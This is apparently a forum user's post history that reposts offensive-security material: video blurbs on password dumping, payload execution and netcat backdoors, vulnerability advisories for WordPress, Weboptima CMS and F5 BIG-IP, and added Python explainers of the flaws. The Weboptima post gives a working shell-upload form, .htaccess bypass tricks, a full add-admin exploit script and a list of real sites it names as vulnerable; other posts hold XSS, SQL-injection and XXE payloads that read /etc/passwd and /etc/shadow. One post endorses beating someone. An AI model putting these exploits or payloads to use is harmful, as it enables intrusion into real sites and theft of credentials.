Everything posted by Praetorian503

  1. Description: In this video I will show you how to dump Windows clear-text passwords. The process is very simple and powerful: just launch the exe with this command (wce.exe -w) and you get the clear-text password of the running user. In this demo I'm using wce for post-exploitation password gathering.
     Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
     Original Source: Dump Clear Text Password Using Wce
  2. Description: Can the government force you to turn over your encryption passphrase or decrypt your data? The law surrounding police attempts to force decryption is developing at breakneck speed, with two major court decisions this year alone. This talk will start off with an in-depth explanation of the Fifth Amendment privilege against self-incrimination, its origins, and how it applies to government attempts to force disclosure of keys or decrypted versions of data in the United States. We'll also discuss law enforcement authority to demand passphrases and decryption of data stored with third parties, and survey key disclosure laws in other countries.
     Marcia Hofmann is a senior staff attorney at the Electronic Frontier Foundation, where she works on a broad range of digital civil liberties issues including computer security, electronic privacy, and free expression. She currently focuses on computer crime and EFF's Coders' Rights Project, which promotes innovation and protects the rights of curious tinkerers and researchers in their cutting-edge exploration of technology. Prior to joining EFF, Marcia was staff counsel and director of the Open Government Project at the Electronic Privacy Information Center (EPIC).
     Original Source: Crypto And The Cops: The Law Of Key Disclosure And Forced Decryption
  3. The WordPress Chocolate theme suffers from cross site scripting, denial of service, path disclosure, abuse of functionality, and remote shell upload vulnerabilities.

Hello list!

I want to warn you about multiple vulnerabilities in the Chocolate WP theme for WordPress. This is a commercial theme for WP. These are Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service and Arbitrary File Upload vulnerabilities.

In 2011 I wrote about Cross-Site Scripting (WASC-08), Full path disclosure (WASC-13), Abuse of Functionality (WASC-42) and Denial of Service (WASC-10) vulnerabilities in TimThumb and multiple themes for WordPress (http://websecurity.com.ua/4910/), and later an Arbitrary File Uploading (WASC-31) vulnerability was also disclosed. In previous years I've written about multiple vulnerabilities in 145 WP themes (http://websecurity.com.ua/4915/) and here is another theme.

-------------------------
Affected products:
-------------------------

Vulnerable are all versions of the Chocolate WP theme for WordPress.

Earlier I informed the developers about these vulnerabilities.

----------
Details:
----------

XSS (WASC-08) (in older versions of TimThumb):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=%3C111
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site&h=1&w=1
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on)

DoS (WASC-10):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1 (bypass of restriction on domain, if such restriction is turned on)

About such Abuse of Functionality and Denial of Service vulnerabilities you can read in my article Using of the sites for attacks on other sites (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html).

Arbitrary File Upload (WASC-31):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/shell.php

Full path disclosure (WASC-13):

http://site/wp-content/themes/dt-chocolate/

Besides index.php there is also potentially FPD in other php-files of this theme.

Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Source: PacketStorm
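The "bypass of restriction on domain" with a host such as site.badsite.com works when the allowed-host check looks for the allowed name anywhere inside the hostname instead of anchoring it at the end. The Python below is an added example, not code from the theme, from TimThumb or from the advisory author: it models the weak check as a plain substring match (an assumption about how the older restriction was written), puts a suffix-anchored check beside it, and runs the advisory's hosts through both. The ALLOWED_SITES list is constructed for the example.

```python
from urllib.parse import urlsplit

# Constructed allowlist of remote hosts thumb.php may fetch from.
ALLOWED_SITES = ["site", "flickr.com"]


def host_of(src: str) -> str:
    """Lower-cased hostname of a thumb.php src= value ('' if there is none)."""
    return (urlsplit(src).hostname or "").lower()


def allowed_substring(src: str) -> bool:
    """Assumed older behaviour: accepted if any allowed name occurs anywhere in
    the host. 'site.badsite.com' and 'badsite.com' both contain 'site'."""
    host = host_of(src)
    return any(site.lower() in host for site in ALLOWED_SITES)


def allowed_suffix(src: str) -> bool:
    """Hardened check: the host must equal an allowed name or end in '.' + name,
    so only that site and its real subdomains pass."""
    host = host_of(src)
    return any(host == s or host.endswith("." + s)
               for s in (x.lower() for x in ALLOWED_SITES))


def triage(srcs):
    """{src: (substring_check, suffix_check)} for a batch of src values."""
    return {s: (allowed_substring(s), allowed_suffix(s)) for s in srcs}


if __name__ == "__main__":
    # The advisory's hosts plus one legitimate subdomain of the site itself.
    for src, (old, new) in triage([
        "http://site/page.png",
        "http://site.badsite.com/big_file",
        "http://img.site/page.png",
        "http://badsite.com/shell.php",
    ]).items():
        print(f"{src:38} substring={old!s:5} suffix={new}")
```

The suffix check only closes the domain bypass. The arbitrary-file-upload case in the advisory (a remote shell.php fetched and stored) still needs the fetched bytes validated as an image and written under a server-generated name rather than the remote filename.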
  4. Weboptima CMS suffers from add administrator and remote shell upload vulnerabilities.

#cs
[1337day.com ASCII banner]
>> Exploit database separated by exploit type (local, remote, DoS, etc.)
[+] Site : 1337day.com
[+] Support e-mail : submit[at]1337day.com
#########################################
I'm AkaStep member from Inj3ct0r Team
#########################################

weboptima_cms_remote_add_admin_shell_upload.au3
============================================
Vulnerable Software: Weboptima CMS
Vendor: http://weboptima.am/
Vulns: REMOTE SHELL UPLOAD AND REMOTE ARBITRARY ADD ADMIN.
Both exploits are available (an HTML exploit to upload a shell, and an AutoIt exploit to add arbitrary admin accounts to the target site). More details below.
============================================
Few DEMOS:
http://navasards.am
http://olivergroup.am
http://iom.am
http://bluefly.am
http://invest-in-armenia.com
http://decart.am
http://armgeokart.am/
============================================
About Vulns:

1'ST vulnerability is REMOTE SHELL UPLOAD:
Any *UNAUTHENTICATED* USER CAN UPLOAD SHELL.

Vulnerable code: //cms/upload.php
=============SNIP BEGINS======================
<?php
$path="../uploades";
if(!file_exists($path))
{
    mkdir($path, 0777);
}
if(isset($_GET['name']))
{
    unlink($path."/".$_GET['name']);
    $letter = $_GET['letter'];
    $selTypey = $_GET['selType'];
    header("Location: upload.php?letter=$letter&selType=$selTypey");
}
?>
<?php include_once("start.php"); ?>
<div align="center">
<table align="center">
<tr>
<td colspan="3" align="center"><span class="title">????? ??????</span></td>
</tr>
<tr>
<td>
<?php
if(isset($_POST['sub']))
{
    $fileName = $_FILES["up_file"]['name'];
    $masSimbl = array('&','%','#');
    if(in_array($fileName[0], $masSimbl))
    {
        echo $fileName[0].' ???????? ?????? ????? ???????';
    }
    else
    {
        move_uploaded_file($_FILES["up_file"]['tmp_name'],"$path/".$_FILES["up_file"]['name']);
    }
}
?>
========================SNIP ENDS=================

Simple HTML exploit to upload your shell:

<form method="post" action="http://CHANGE_TO_TARGET/cms/upload.php" enctype="multipart/form-data">
<input type="file" name="up_file" />
<input type="submit" class="button" name="sub" value="send">
</form>

After a successful shell upload your shell can be found at:
http://site.tld/uploades/shellname.php

NOTE: There may be a simple .htaccess to prevent you from accessing the shell (HTTP 403). This is not a problem, just upload your shell like: myshell.PhP or myshell.pHp
OWNED.

2'nd vulnerability is: REMOTE ADD ADMIN
Any *UNAUTHENTICATED* USER CAN ADD ARBITRARY ADMIN ACCOUNT(s) TO TARGET SITE.

Vulnerable Code: //cms/loginPass.php
Notice: header() without exit; *Script continues its execution.*
==================SNIP BEGINS=========
<?php
session_start();
if($_SESSION['status_shoping_adm']!="adm_shop")
{
    header("Location: index.php");
}
require_once('../myClass/DatabaseManeger.php');
require_once("../myClass/function.php");
$_POST = stripSlash($_POST);
$_GET = stripSlash($_GET);
?>
<?php
$error = "";
//And more stuff
==================SNIP ENDS=============

And here is the exploit, written in AutoIt, to exploit this vulnerability and add an admin to the target site.

Exploit usage (CLI):
weboptima.exe http://decart.am AzerbaijanBlackHatzWasHere AzerbaijanBlackHatzWasHere

##############################################################
Weboptima CMS(weboptima.am) REMOTE ADD ADMIN EXPLOIT(priv8)
Usage: weboptima.exe http://site.tld username password
[*] DON'T HATE THE HACKER, HATE YOUR OWN CODE! [*]
[@@@] Vuln & Exploit By AkaStep [@@@]
##############################################################
[+] GETTING INFO ABOUT CMS [+]
[*] GOT Response : Yes! It is exactly that we are looking for! [*]
##################################################
Trying to add new admin:
To Site:www.decart.am
With Username: AzerbaijanBlackHatzWasHere
With Password: AzerbaijanBlackHatzWasHere
##################################################
##################################################
Exploit Try Count:1
##################################################
Error Count:0
##################################################
##################################################
Exploit Try Count:2
##################################################
Error Count:0
##################################################
Count of errors during exploitation : 0
##################################################
[*] Yaaaaa We are Going To Travel xD [*]
Try to login @
Site: decart.am/cms/index.php
With Username: AzerbaijanBlackHatzWasHere
With Password: AzerbaijanBlackHatzWasHere
*NOTE* Make Sure Your Browser Reveals HTTP REFERER!
 OTHERWISE YOU WILL UNABLE TO LOGIN!
##################################################
[*] Exit [*]
##################################################
#ce

#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#NoTrayIcon
#include "WinHttp.au3"
#include <inet.au3>
#include <String.au3>

$exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _
'Weboptima CMS(weboptima.am) REMOTE ADD ADMIN EXPLOIT(priv8) ' & @CRLF & _
'Usage: ' & @ScriptName & ' http://site.tld ' & ' username ' & 'password ' & _
@CRLF & "[*] DON'T HATE THE HACKER, HATE YOUR OWN CODE! [*]" & @CRLF & _
'[@@@] Vuln & Exploit By AkaStep [@@@]' & @CRLF & _StringRepeat('#',62);
ConsoleWrite(@CRLF & $exploitname & @CRLF)
$method='POST';
$vulnurl='cms/loginPass.php?test=' & Random(1,15677415,1);
Global $count=0,$error=0;
$cmsindent='kcaptcha'; # We will use it to identify CMS #;
$adminpanel='/cms/index.php';
;#~ Impersonate that We Are Not BOT or exploit.We are human who uses IE. Dohhh))# ~;
$useragent='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)';
$msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' http://site.tld ' & ' usernametoadd ' & 'passwordtoadd' & @CRLF
if $CmdLine[0] <> 3 Then
    MsgBox(64,"",$msg_usage);
    ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);
    exit;
EndIf
if $CmdLine[0]=3 Then
    $targetsite=$CmdLine[1];
    $username=$CmdLine[2];
    $password=$CmdLine[3];
EndIf
if StringStripWS($targetsite,8)='' OR StringStripWS($username,8)='' OR StringStripWS($password,8)='' Then
    ConsoleWrite('Are you kidding me?');
    Exit;
EndIf
HttpSetUserAgent($useragent)
$doublecheck=InetGet($targetsite,'',1);
if @error Then
    ConsoleWrite('[*] Are you sure that site exist? Theris an error! Please Try again! [*]' & @CRLF)
    Exit;
EndIf
ConsoleWrite('[+] GETTING INFO ABOUT CMS [+] ' & @CRLF);
sleep(Random(1200,2500,1));
HttpSetUserAgent($useragent);
$sidentify=_INetGetSource($targetsite & $adminpanel,True);
if StringInStr($sidentify,$cmsindent) Then
    ConsoleWrite("[*] GOT Response : Yes! It is exactly that we are looking for! [*]" & @CRLF)
Else
    ConsoleWrite("[*] IDENTIFICATION RESULT IS WRONG!. Anyway,forcing to try exploit it. [*]" & @CRLF)
    $error+=1;
EndIf
$targetsite='www.' & StringReplace(StringReplace($targetsite,'http://',''),'/','')
priv8($targetsite,$username,$password,$count,$error);#~ do the magic for me plizzz));~#

Func priv8($targetsite,$username,$password,$count,$error)
    $count+=1;~ #~ We are not going to exploit in infinitive manner xD #~;
    Global $sAddress = $targetsite
    $triptrop=@CRLF & _StringRepeat('#',50) & @CRLF;
    $whatcurrentlywedo=$triptrop & 'Trying to add new admin: ' & @CRLF & 'To Site:' & $targetsite & @CRLF & 'With Username: ' & _
    $username & @CRLF & 'With Password: ' & $password & $triptrop;
    if $count <=1 then ConsoleWrite($whatcurrentlywedo)
    $doitnicely=$triptrop & 'Exploit Try Count:' & $count & $triptrop & 'Error Count:' & $error & $triptrop;
    ConsoleWrite($doitnicely);
    Global $sPostData = "login=" & $username & "&password=" & $password & "&status=1" & "&add_sub=Add+New";
    if $error>=2 OR $count>=2 Then
        ConsoleWrite('Count of errors during exploitation : ' & $error & @CRLF)
        if int($error)=0 then
            ConsoleWrite($triptrop & '[*] Yaaaaa We are Going To Travel xD [*]' & _
            @CRLF & 'Try to login @ ' & @CRLF & _
            'Site: ' & $targetsite & $adminpanel & @CRLF &'With Username: ' & _
            $username & @CRLF & 'With Password: ' & $password & @CRLF & _
            '*NOTE* Make Sure Your Browser Reveals HTTP REFERER!' & @CRLF & _
            ' OTHERWISE YOU WILL UNABLE TO LOGIN! ' & $triptrop & '[*] Exit [*]' & $triptrop);
            exit;
        Else
            ConsoleWrite($triptrop & '[*] Seems Is not exploitable or Vuln Fixed? [*]' & @CRLF & _
            '[*] Anyway,try to login with new credentials. [*]' & @CRLF & _
            '[*] May be you are Lucky;) [*]' & _
            @CRLF & 'Try to login @ ' & @CRLF & _
            'Site: ' & $targetsite & $adminpanel & @CRLF & _
            'With Username: ' & $username & @CRLF & 'With Password: ' & $password & $triptrop & '[*] Exit [*]' & $triptrop);
        EndIf
        exit;
    EndIf
    Global $hOpen = _WinHttpOpen($useragent);
    Global $hConnect = _WinHttpConnect($hOpen, $sAddress)
    Global $hRequest = _WinHttpOpenRequest($hConnect,$method,$vulnurl,Default,Default,'');
    _WinHttpAddRequestHeaders($hRequest, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8")
    _WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-US,en;q=0.5")
    _WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate")
    _WinHttpAddRequestHeaders($hRequest, "DNT: 1")
    _WinHttpAddRequestHeaders($hRequest, "Referer: " & $targetsite & $vulnurl);# We need it #;
    _WinHttpAddRequestHeaders($hRequest, "Cookie: ComeToPwnYou");#~ Not neccessary just for compatibility.Change or "rm" it if you want. #~;
    _WinHttpAddRequestHeaders($hRequest, "Connection: keep-alive")
    _WinHttpAddRequestHeaders($hRequest, "Content-Type: application/x-www-form-urlencoded")
    _WinHttpAddRequestHeaders($hRequest, "Content-Length: " & StringLen($sPostData));
    _WinHttpSendRequest($hRequest, -1, $sPostData)
    _WinHttpReceiveResponse($hRequest)
    Global $sHeader, $sReturned
    If _WinHttpQueryDataAvailable($hRequest) Then
        $sHeader = _WinHttpQueryHeaders($hRequest)
        Do
            $sReturned &= _WinHttpReadData($hRequest)
        Until @error
        _WinHttpCloseHandle($hRequest)
        _WinHttpCloseHandle($hConnect)
        _WinHttpCloseHandle($hOpen)
        $targetsite=StringMid($targetsite,5,StringLen($targetsite))
        Sleep(Random(10000,20000,1));
        priv8($targetsite,$username,$password,$count,$error);#~ Pass to function and TRY to Exploit #~;
    Else
        $error+=1;#~ iNCREMENT ERROR(s) COUNT. CUZ SOMETHING WENT WRONG ~#;
        _WinHttpCloseHandle($hRequest)
        _WinHttpCloseHandle($hConnect)
        _WinHttpCloseHandle($hOpen)
        $targetsite=StringMid($targetsite,5,StringLen($targetsite))
        Sleep(Random(10000,20000,1));
        priv8($targetsite,$username,$password,$count,$error);#~double check anyway.;~#
    EndIf
EndFunc;=> priv8();

#cs
================================================
KUDOSSSSSSS
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com
itsecuritysolutions.org
to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers
Also special thanks to: ottoman38 & HERO_AZE
================================================
/AkaStep
#ce

Source: PacketStorm
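The upload.php snippet above inspects only the first character of the client-supplied filename (against &, % and #) and then stores the file under that name, which is why shell.php goes straight through and why the post's myshell.PhP trick gets past a case-sensitive .htaccess rule. The Python below is an added example, not code from the post or from Weboptima CMS: it transliterates that check, puts an extension-allowlist check beside it that compares case-insensitively and refuses path components and double extensions, and generates the on-disk name server-side. The ALLOWED_EXTENSIONS set is constructed for the example.

```python
import os
import secrets

# Transliteration of upload.php: only the first character is examined.
BLOCKED_FIRST_CHARS = {"&", "%", "#"}

# Constructed allowlist; an application should list only what it really accepts.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf"}


def weboptima_accepts(filename: str) -> bool:
    """Vulnerable behaviour: anything not starting with &, % or # is stored
    under its own name, so shell.php, myshell.PhP and ../x.php all pass."""
    return bool(filename) and filename[0] not in BLOCKED_FIRST_CHARS


def hardened_accepts(filename: str) -> bool:
    """Allowlist by extension, compared case-insensitively (myshell.PhP is just
    .php and is rejected); exactly one dot, no leading dot, no path parts."""
    if filename != os.path.basename(filename) or filename in ("", ".", ".."):
        return False
    if filename.count(".") != 1 or filename.startswith("."):
        return False
    return filename.rsplit(".", 1)[1].lower() in ALLOWED_EXTENSIONS


def storage_name(filename: str) -> str:
    """Never reuse the client's name on disk: random basename plus the
    validated, lower-cased extension (32 hex chars + '.' + ext)."""
    if not hardened_accepts(filename):
        raise ValueError(f"rejected upload name: {filename!r}")
    return f"{secrets.token_hex(16)}.{filename.rsplit('.', 1)[1].lower()}"


def compare(names):
    """{name: (vulnerable_check, hardened_check)} for a batch of filenames."""
    return {n: (weboptima_accepts(n), hardened_accepts(n)) for n in names}


if __name__ == "__main__":
    for name, verdicts in compare(
        ["photo.JPG", "shell.php", "myshell.PhP", "shell.php.jpg", "../photo.jpg", "#x.php"]
    ).items():
        print(f"{name:16} vulnerable={verdicts[0]!s:5} hardened={verdicts[1]}")
```

The random storage name also removes the post's second lever: with no client-controlled name there is nothing for the unlink() branch at the top of upload.php to be pointed at, and the .htaccess rule stops being the only thing between an uploaded file and the PHP handler.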
  5. The password doesn't work for me either. I don't think you unpacked the archive either )
  6. Description: In this video I will show you how to execute your payload for a meterpreter shell using shellcodeexec. Shellcodeexec is an exe and script that allows you to execute your payload and helps to exploit the target machine.
     Original Source: Execute Your Payload Using Shellcodeexec
  7. Description: In this video I will show you how to use netcat as a backdoor. First you need to exploit a Windows system, then upload the netcat exe; after uploading netcat, set the firewall rules and registry. The process is very simple but useful for maintaining access.
     Original Source: Post - Exploitation - Persistent Netcat Backdoor
  8. Show him a little respect. Catch him, give him a few smacks, if there's nothing he can do about it. That's how it is when you have connections, you're tough.
  9. F5 BIG-IP versions 11.2.0 and below suffer from a remote SQL injection vulnerability.

SEC Consult Vulnerability Lab Security Advisory < 20130122-1 >
=======================================================================
              title: SQL Injection
            product: F5 BIG-IP
 vulnerable version: <=11.2.0
      fixed version: 11.2.0 HF3
                     11.2.1 HF3
         CVE number: CVE-2012-3000
             impact: Medium
           homepage: http://www.f5.com/
              found: 2012-09-03
                 by: S. Viehböck
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor/product description:
---------------------------
"The BIG-IP product suite is a system of application delivery services that work together on the same best-in-class hardware platform or software virtual instance. From load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available."

URL: http://www.f5.com/products/big-ip/

Vulnerability overview/description:
-----------------------------------
A SQL injection vulnerability exists in a BIG-IP component. This enables an authenticated attacker to access the MySQL database with the rights of MySQL user "root" (= highest privileges). Furthermore an attacker can access files in the file system with the rights of the "mysql" OS user.

Proof of concept:
-----------------
The following exploit shows how files can be extracted from the file system:

POST /sam/admin/reports/php/saveSettings.php HTTP/1.1
Host: bigip
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 119

{ "id": 2, "defaultQuery": "XX', ext1=(SELECT MID(LOAD_FILE('/etc/passwd'),0,60)) -- x" }

Note: target fields are only VARCHAR(60) thus MID() is used for extracting data.

A request to /sam/admin/reports/php/getSettings.php returns the data:

HTTP/1.1 200 OK
...
{success:true,totalCount:1,rows:[{"id":"2","user":"admin","defaultQuery":"XX","ext1":"root:x:0:0:root:\/root:\/bin\/bash\nbin:x:1:1:bin:\/bin:\/sbin\/nol","ext2":""}]}

Vulnerable / tested versions:
-----------------------------
The vulnerability has been verified to exist in the F5 BIG-IP version 11.2.0. Successful exploitation was possible with Application Security (ASM) or Access Policy (APM) enabled.

Vendor contact timeline:
------------------------
2012-10-04: Sending advisory draft and proof of concept.
2012-11-21: Vendor announces that fix will be provided with 11.2.0 HF3 and 11.2.1 HF3.
2013-01-22: SEC Consult releases coordinated security advisory.

Solution:
---------
Update to 11.2.0 HF3 or 11.2.1 HF3.

Workaround:
-----------
No workaround available.

Advisory URL:
--------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com
EOF S. Viehböck / @2013

Source: PacketStorm
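The advisory's note that the target columns are VARCHAR(60) is the practical constraint of this bug: LOAD_FILE() can read a whole file, but only one 60-character window survives the write into ext1, so a file has to be pulled out window by window and reassembled. The Python below is an added example, not code from SEC Consult or from F5: it builds the defaultQuery payload for each window in the advisory's shape, simulates the saveSettings.php/getSettings.php round trip against a constructed stand-in for /etc/passwd with MySQL's 1-based MID() semantics, and walks the file until a short window marks the end.

```python
import re

FIELD_WIDTH = 60  # ext1/ext2 are VARCHAR(60) per the advisory

# Constructed stand-in for /etc/passwd on the appliance (not real data).
FAKE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "bin:x:1:1:bin:/bin:/sbin/nologin\n"
    "mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash\n"
)


def mysql_mid(s: str, pos: int, length: int) -> str:
    """MySQL MID()/SUBSTRING() semantics: positions are 1-based, a negative
    position counts from the end, and position 0 or length <= 0 yields ''."""
    if pos == 0 or length <= 0:
        return ""
    if pos < 0:
        pos = len(s) + pos + 1
        if pos < 1:
            return ""
    return s[pos - 1:pos - 1 + length]


def injected_default_query(path: str, pos: int, width: int = FIELD_WIDTH) -> str:
    """The defaultQuery value for one window, in the advisory's shape."""
    return f"XX', ext1=(SELECT MID(LOAD_FILE('{path}'),{pos},{width})) -- x"


def simulated_backend(payload: str, files: dict) -> str:
    """Stand-in for the saveSettings.php write plus the getSettings.php read:
    recover path/pos/width from the payload, apply MID() to the file, and
    truncate to the column width exactly as the VARCHAR(60) column would."""
    m = re.search(r"LOAD_FILE\('([^']+)'\),(-?\d+),(\d+)\)", payload)
    if not m:
        return ""
    path, pos, width = m.group(1), int(m.group(2)), int(m.group(3))
    return mysql_mid(files.get(path, ""), pos, width)[:FIELD_WIDTH]


def dump_file(path: str, backend, width: int = FIELD_WIDTH) -> str:
    """Walk the file in column-sized windows starting at position 1; a window
    shorter than the column marks the end of the file."""
    out, pos = [], 1
    while True:
        chunk = backend(injected_default_query(path, pos, width))
        out.append(chunk)
        if len(chunk) < width:
            return "".join(out)
        pos += width


if __name__ == "__main__":
    backend = lambda p: simulated_backend(p, {"/etc/passwd": FAKE_PASSWD})
    print(dump_file("/etc/passwd", backend))
```

Each window costs one write and one read, so the request count is ceil(len(file)/60) pairs; on the fix side the only durable answer is a parameterised UPDATE for defaultQuery, since the column width was never a security control.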
  10. F5 BIG-IP versions 11.2.0 and below suffer from an XML external entity injection (XXE) vulnerability.

SEC Consult Vulnerability Lab Security Advisory < 20130122-0 >
=======================================================================
              title: XML External Entity Injection (XXE)
            product: F5 BIG-IP
 vulnerable version: <=11.2.0
      fixed version: 11.2.0 HF3
                     11.2.1 HF3
         CVE number: CVE-2012-2997
             impact: Medium
           homepage: http://www.f5.com/
              found: 2012-09-03
                 by: S. Viehböck
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor/product description:
---------------------------
"The BIG-IP product suite is a system of application delivery services that work together on the same best-in-class hardware platform or software virtual instance. From load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available."

URL: http://www.f5.com/products/big-ip/

Vulnerability overview/description:
-----------------------------------
An XML External Entity Injection (XXE) vulnerability exists in a BIG-IP component. This enables an authenticated attacker to download arbitrary files from the file system with the rights of the "apache" OS user. The BIG-IP configuration even allows access to the critical /etc/shadow file which contains the password hashes of users.

Proof of concept:
-----------------
The following exploit shows how files can be extracted from the file system:

POST /sam/admin/vpe2/public/php/server.php HTTP/1.1
Host: bigip
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 143

<?xml version="1.0" encoding='utf-8' ?>
<!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]>
<message><dialogueType>&e;</dialogueType></message>

The response includes the content of the file:

<?xml version="1.0" encoding="utf-8"?>
<message><dialogueType>any</dialogueType><status>generalError</status><command>any</command><accessPolicyName>any</accessPolicyName><messageBody><generalErrorText>Client has sent unknown dialogueType '
root:--hash--:15490::::::
bin:*:15490::::::
daemon:*:15490::::::
adm:*:15490::::::
lp:*:15490::::::
mail:*:15490::::::
uucp:*:15490::::::
operator:*:15490::::::
nobody:*:15490::::::
tmshnobody:*:15490::::::
admin:--hash--:15490:0:99999:7:::
...

Vulnerable / tested versions:
-----------------------------
The vulnerability has been verified to exist in the F5 BIG-IP version 11.2.0. No modules have to be enabled for successful exploitation.

Vendor contact timeline:
------------------------
2012-09-07: Contacting vendor - requesting PGP/SMIME key.
2012-09-07: Vendor provides case number and PGP key.
2012-09-11: Sending advisory draft and proof of concept.
2012-09-20: Vendor has a fix for the vulnerability - will be released "with different hot fixes for different releases".
2012-11-21: Vendor announces that fix will be provided with 11.2.0 HF3 and 11.2.1 HF3.
2013-01-22: SEC Consult releases coordinated security advisory.

Solution:
---------
Update to 11.2.0 HF3 or 11.2.1 HF3.
Patch information is also available at:
http://support.f5.com/kb/en-us/solutions/public/14000/100/sol14138.html

Workaround:
-----------
No workaround available.

Advisory URL:
--------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com
EOF S. Viehböck / @2013

Source: PacketStorm
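Two things make the PoC above work: the parser behind server.php honours an inline DTD, so the request can declare an entity that reads /etc/shadow, and the error path echoes the unknown dialogueType back, so the entity's expansion rides out in generalErrorText. The Python below is an added example, not code from SEC Consult or from F5: it is a receiver for the same <message> shape that refuses any document carrying a DOCTYPE before the XML parser ever sees it, and whose error text never echoes the client value. The PoC bytes are copied from the advisory; the benign message is constructed.

```python
import re
import xml.etree.ElementTree as ET

# Any DOCTYPE is refused: this endpoint never needs a DTD, and a DTD is the
# only place an <!ENTITY ... SYSTEM '/etc/shadow'> declaration can live.
# Matching raw bytes means the check also fires on a DOCTYPE hidden in a
# comment; that is a deliberate fail-closed choice.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)

# Request body from the advisory (copied), and a constructed benign one.
POC = (b"<?xml version=\"1.0\" encoding='utf-8' ?>\n"
       b"<!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]>\n"
       b"<message><dialogueType>&e;</dialogueType></message>")
BENIGN = b"<message><dialogueType>ping</dialogueType></message>"

KNOWN_DIALOGUE_TYPES = {"ping"}   # constructed; server.php's real set is not on the page


class XmlRejected(ValueError):
    pass


def parse_message(raw: bytes) -> str:
    """Return the dialogueType of a <message> document, or raise XmlRejected."""
    if DOCTYPE_RE.search(raw):
        raise XmlRejected("DOCTYPE not allowed")
    try:
        root = ET.fromstring(raw)
    except ET.ParseError as exc:
        raise XmlRejected(f"malformed XML: {exc}") from None
    if root.tag != "message":
        raise XmlRejected(f"unexpected root element {root.tag!r}")
    node = root.find("dialogueType")
    return (node.text or "") if node is not None else ""


def handle_request(raw: bytes):
    """('ok', dialogueType) or ('rejected'|'unknown', reason). The reason for an
    unknown dialogueType is a fixed string: the advisory's leak channel was the
    error text echoing the client-supplied value."""
    try:
        dialogue = parse_message(raw)
    except XmlRejected as exc:
        return ("rejected", str(exc))
    if dialogue not in KNOWN_DIALOGUE_TYPES:
        return ("unknown", "Client has sent unknown dialogueType")
    return ("ok", dialogue)


if __name__ == "__main__":
    for body in (POC, BENIGN, b"<message><dialogueType>x</dialogueType></message>"):
        print(handle_request(body))
```

If the application cannot refuse DTDs outright, the parser itself has to be configured to neither load external entities nor expand internal ones; the pre-parse refusal above is the option that does not depend on remembering a parser flag for every library in the stack.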
  11. Perforce P4web 2011 / 2012 web client suffers from a cross site scripting vulnerability.

# Exploit Title: Perforce P4web 2011/2012 Web Client XSS Vulnerability
# Date: 21 Jan 2013
# Researcher: Christy Philip Mathew
# Email: christypriory@gmail.com
# Vendor or Software Link:
